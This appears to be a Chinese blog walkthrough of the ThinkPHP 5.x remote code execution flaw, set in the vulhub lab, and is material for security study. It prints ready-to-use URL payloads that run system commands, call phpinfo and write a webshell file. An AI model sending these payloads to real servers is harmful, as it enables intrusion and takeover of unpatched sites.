当前位置: 首页 > news >正文

Thinkphp(TP)漏洞攻略

Thinkphp5x远程命令执⾏及getshell

靶场:vulhub/thinkphp/5-rce

1,启动环境后进行访问

2,我们可以直接使用工具来操作

也可以使用远程命令/远程代码来执行

远程命令执行

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=whoami

远程代码执行

? s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[ 1][]=-1

3,getshell

在输入框中输入以下内容在根目录生成1.php文件,输出phpinfo

? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=echo "" >>1.php

相关文章:

  • python基础语法中的内置函数与拆包
  • 我的创作纪念日暨六年编程路的回顾
  • Select多路转接
  • 深入理解 Bitmap 索引:原理、场景与应用案例
  • ccf2202邻域均值
  • PostgreSQL并行化内容
  • API接口文档(人力资源管理系统)
  • 给网站配置https访问
  • JVM(基础篇)
  • gitlab将其他分支设置为master分支
  • 机器学习之回归
  • MOSN(Modular Open Smart Network)是一款主要使用 Go 语言开发的云原生网络代理平台
  • Java中static final才是修饰常量的,单独的final并不能修饰常量这样理解对吗?
  • 【Linux】线程基础
  • 全星FMEA软件系统——助力汽车部件行业高效管控质量风险
  • [计算机三级网络技术]第二章:中小型网络系统总体规划与设计方法
  • VSTO(C#)Excel开发进阶1:设计功能区Ribbon 对话框加载器 多个功能区 多个组
  • 酷淘商场项目【从零到一详解】Web端
  • 华为交换相关
  • 编程基础:位运算01,位运算引言
  • 中国驻日本大使吴江浩就日本民用飞机侵闯我钓鱼岛领空向日方提出严正交涉
  • 媒体:机票盲盒值不值得开?年轻人正用行为博弈的逻辑重构规则
  • AI世界的年轻人|他用影像大模型解决看病难题,“要做的研究还有很多”
  • 礼来一季度净利增近三成,明星GLP-1药物替尔泊肽贡献近半收入
  • 李铁案二审驳回上诉,维持一审有期徒刑20年的判决
  • 工行一季度净赚841亿元降3.99%,营收降3.22%